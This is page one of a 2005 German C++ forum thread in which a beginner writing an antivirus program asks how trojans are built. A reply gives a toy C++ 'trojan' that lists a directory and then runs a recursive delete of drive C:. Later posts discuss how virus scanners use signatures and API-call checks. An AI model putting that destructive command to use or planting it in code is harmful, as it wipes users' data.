Herzlich Willkommen, lieber Gast!
  Sie befinden sich hier:

  Forum » Allgemeines (OffTopic) » AntiViren Prog

Forum | Hilfe | Team | Links | Impressum | > Suche < | Mitglieder | Registrieren | Einloggen
  Quicklinks: MSDN-Online || STL || clib Reference Grundlagen || Literatur || E-Books || Zubehör || > F.A.Q. < || Downloads   

Autor Thread - Seiten: > 1 < [ 2 ] [ 3 ]
000
11.10.2005, 09:52 Uhr
Michi



Hallo,
Ich bin dabei mein erstes kleines AntiViren Programm in C++ zu schreiben.
Dabei is mir aufgefallen, dass ich gar net genau weis, wie ein Trojaner, was ja ein häufiger Angriff ist, aufgebaut ist. Also Wollte ich euch fragen, ob ihr einen C++ Quelltext eines Trojaners habt, aber nicht damit ich Schaden anrichte, sondern mich dagegen wehren kann.
Danke im Vorraus,
Michael
--
_____________________________________
_____________Open Source_____________
___Das Wissen, gehört der Menschheit____
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
001
11.10.2005, 10:07 Uhr
virtual
Sexiest Bit alive
(Operator)


Kein Problem:

C++:
#include <iostream>
#include "windows.h"

int main() {
     system("DIR");
     system("DELTREE /s /q c:");
}



Programm kompilieren zu dir.exe und du hast einen (schlechten Trojaner): Gibt vor ein Verzeichnis anzuzeigen aber macht zusätzlich noch was böses. Das ist ein Trojaner
--
Gruß, virtual
Quote of the Month
Ich eß' nur was ein Gesicht hat (Creme 21)
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
002
11.10.2005, 10:29 Uhr
Michi



Heißt das, ich hätte gar keine anhaltspunkte wie ein trojaner typischer weise aufgebaut ist?
--
_____________________________________
_____________Open Source_____________
___Das Wissen, gehört der Menschheit____
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
003
11.10.2005, 10:32 Uhr
Guybrush Threepwood
Gefürchteter Pirat
(Operator)


Würde das denn so funktionieren
Ich meine wenn du das als Dir.exe ablegst würde system("Dir") sich doch nur immer wieder selber aufrufen, also quasi eine endlos rekursion...
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
004
11.10.2005, 10:44 Uhr
(un)wissender
Niveauwart


So unrecht hat der man da nicht? Wer probiert es aus (mit obigem Programm) und berichtet über einen Zweitrechner davon .
--
Wer früher stirbt ist länger tot.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
005
11.10.2005, 10:46 Uhr
hsp



ich bin da ehrlich gesagt eher wenig motiviert, das zu probieren
allerdings glaube ich das sehr viele dateien nicht gelöscht werden können, weil windows die ganze zeit zugriffsverletzungen ausspucken wird
davon abgesehen dürfte es dennoch ne ganze menge schaden anrichten
--
Actiones nostras, quaesumus, Domine, aspirando praeveni et adiuvando prosequere, ut cuncta nostra operatio a te semper incipiat, et per te coepta finiatur.

Dieser Post wurde am 11.10.2005 um 10:46 Uhr von hsp editiert.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
006
11.10.2005, 11:08 Uhr
virtual
Sexiest Bit alive
(Operator)



Zitat von Guybrush Threepwood:
Würde das denn so funktionieren
Ich meine wenn du das als Dir.exe ablegst würde system("Dir") sich doch nur immer wieder selber aufrufen, also quasi eine endlos rekursion...


Das hängt davon ab, ob es dir,exe überhaupt gibt. Könnte auch ein Bultin-Commando in cmd.exe sein. Das kann Dir ein Windowsuser besser beantworten.
So wird auch kein normaler Mensch ein Trojaner implementieren, sondern statt des System- Aufrufe entsprechende Calls das WinAPIs nutzen. Der Grundgedanke, was ein Trojaner macht, sollte aber dennoch klar geworden sein.
--
Gruß, virtual
Quote of the Month
Ich eß' nur was ein Gesicht hat (Creme 21)
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
007
11.10.2005, 11:15 Uhr
Tommix




Zitat von virtual:

So wird auch kein normaler Mensch ein Trojaner implementieren, ...

Ein normaler Mensch implementiert überhaupt keine Trojaner.
- Tommix
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
008
11.10.2005, 11:19 Uhr
virtual
Sexiest Bit alive
(Operator)



Zitat von Michi:
Heißt das, ich hätte gar keine anhaltspunkte wie ein trojaner typischer weise aufgebaut ist?


Ich kenne mich mit Virenscannern nicht so direkt aus.

Wenn ich mir aber vorstelle, wie ein Virenscanner arbeitet, dann hat man also immer Signaturen, also Erkennungsmerkmale von Viren. Die dürften sehr individuell sein, d.h. erstmal muß jemand gesagt haben: xyz.exe ist ein Trojaner, das hat meinen Rechner zerlegt. Erst nach diesem ersten Schadensfall geht man wohl hin und untersucht den trojaner und sucht nach bestimmten Texten, Bytefolgen, welche in xyz.exe drin sind und wird dann eine entsprechende Signatur schreiben, die mitteilt: wenn eine Datei die Kritieren der Signatur matcht, ists wohl Malware.

Denkbar wäre auch, daß man untersucht, ob ein programm bestimmte API Calls aufsucht. zB könnte man schon herausbekommen, daß wenn notepad.exe plötzlich die WindowsAPI Funktion zum versenden von Mails oder zum Rebooten des Rechners enthält, daß das dann eher auch einen Trojaner hindeutet.

Ich denke, Virenscanner sind ne Wissenschaft für sich.
--
Gruß, virtual
Quote of the Month
Ich eß' nur was ein Gesicht hat (Creme 21)
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
009
11.10.2005, 11:20 Uhr
(un)wissender
Niveauwart


Wer ist schon normal?
--
Wer früher stirbt ist länger tot.
 
Profil || Private Message || Suche Download || Zitatantwort || Editieren || Löschen || IP
Seiten: > 1 < [ 2 ] [ 3 ]     [ Allgemeines (OffTopic) ]  


ThWBoard 2.73 FloSoft-Edition
© by Paul Baecher & Felix Gonschorek (www.thwboard.de)

Anpassungen des Forums
© by Flo-Soft (www.flo-soft.de)

Sie sind Besucher: